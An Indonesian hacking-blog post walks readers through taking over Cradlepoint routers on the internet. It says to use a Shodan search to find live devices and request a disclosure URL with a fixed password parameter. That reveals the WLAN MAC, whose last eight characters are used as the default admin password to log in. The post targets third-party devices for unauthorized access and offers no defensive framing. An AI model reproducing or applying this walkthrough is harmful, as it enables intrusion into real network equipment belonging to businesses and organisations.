Cradlepoint Router Password Disclosure With Shodan


Garudasecurityhacker.id - Halo selamat malam, kali ini saya iseng iseng baca artikel dan nemuin exploit buat Router Cradlepoint , meski ane bingun juga sih karena yah bahasa inggris ane kurang banget :(

Apa Sih Cradlepoint ?
Cradlepoint adalah Cabang, jaringan seluler, dan IoT edge sedang mengalami perubahan dramatis - dan membawa WAN perusahaan tradisional ke titik puncaknya. Organisasi harus mengelola situs cabang yang kompleks; armada kendaraan data-driven dan pusat komando seluler; sejumlah besar kasus penggunaan IoT dan M2M; dan segala sesuatu di antaranya.
Didirikan pada tahun 2006, Cradlepoint telah tumbuh menjadi pemimpin industri dalam solusi jaringan 4G LTE yang disalurkan secara cloud untuk bisnis, penyedia layanan, dan organisasi pemerintah, dan kami berkomitmen untuk memperluas kepemimpinan kami ke ruang 5G yang baru muncul. Lebih dari 23.000 pelanggan di seluruh dunia dalam bidang ritel, layanan keuangan, perawatan kesehatan, transportasi, sektor publik, dan industri lainnya mengandalkan Cradlepoint untuk menjaga cabang dan jaringan seluler mereka, dan perangkat IoT, selalu terhubung dan dilindungi. Visi Elastic Edge ™ kami menyediakan cetak biru untuk generasi berikutnya, jaringan tepi yang ditentukan oleh perangkat lunak yang dibangun di atas layanan nirkabel 4G / 5G yang luas dan andal, menghubungkan orang, tempat, dan hal-hal di mana saja dengan visibilitas, keamanan, dan kontrol kelas perusahaan.
Paket Solusi NetCloud all-inclusive Cradlepoint untuk jaringan cabang, seluler, dan IoT menggabungkan layanan NetCloud yang disesuaikan dengan perangkat keras yang dibuat khusus dan rencana dukungan yang komprehensif. Paket Solusi NetCloud dikelola oleh cloud dan dapat diterapkan di mana saja dalam beberapa hari, bukan bulan.
Cradlepoint adalah perusahaan swasta yang berkantor pusat di Boise, Idaho, dengan pusat pengembangan di Silicon Valley, California, dan kantor internasional di Inggris dan Australia.
Sumber : https://cradlepoint.com/

Yap itulah penjelasan dari Cradlepoint Router, semacam router buat ngatur Jaringan, Transportasi (IoT) dan sebagainya

Langsung aja ke tutorial Cradlepoint Router Password Disclosure With Shodan, pertama kalian buka yang namanya Shodan.io jika sudah masukan keyword
cradlepointhttpservice

Jika sudah kalian pilih target yang "200 OK" dan klik Icon Open link, maka kalian akan ke halaman login routernya

Langsung ajah kalian masukan exploit buat mengetahui passwordnya (WLAN_MAC)
Nah lihat gambar maka akan muncul seperti itu, langsung sajah ambil bagian
http://[ip]/plt?password=W6rqCjk5ijRs6Ya5bv55
Nah selanjutnya kalian scroll kebawah dan akan menemukan

<WLAN_MAC>00:30:44:1b:8a:b5</WLAN_MAC>
Maka itu adalah password defaul dari Routernya, langsung saja ambil 8 karakter terakhir maka jadi seperti ini
441b8ab5
Dan sekarang kembali ke halaman login dan masukan
username : admin
password: 441b8ab5
Maka akan berhasil login ke halaman menu utama router, disana banyak sekali menu silakan di buka buka sendiri karena admin juga belum paham dengan menu2nya dan apa kegunaanya sih


Sekian tutorial malam ini jangan lupa untuk bagikan ke social media kalian
By : Esevenb (Endang Gunawan)


4 komentar


EmoticonEmoticon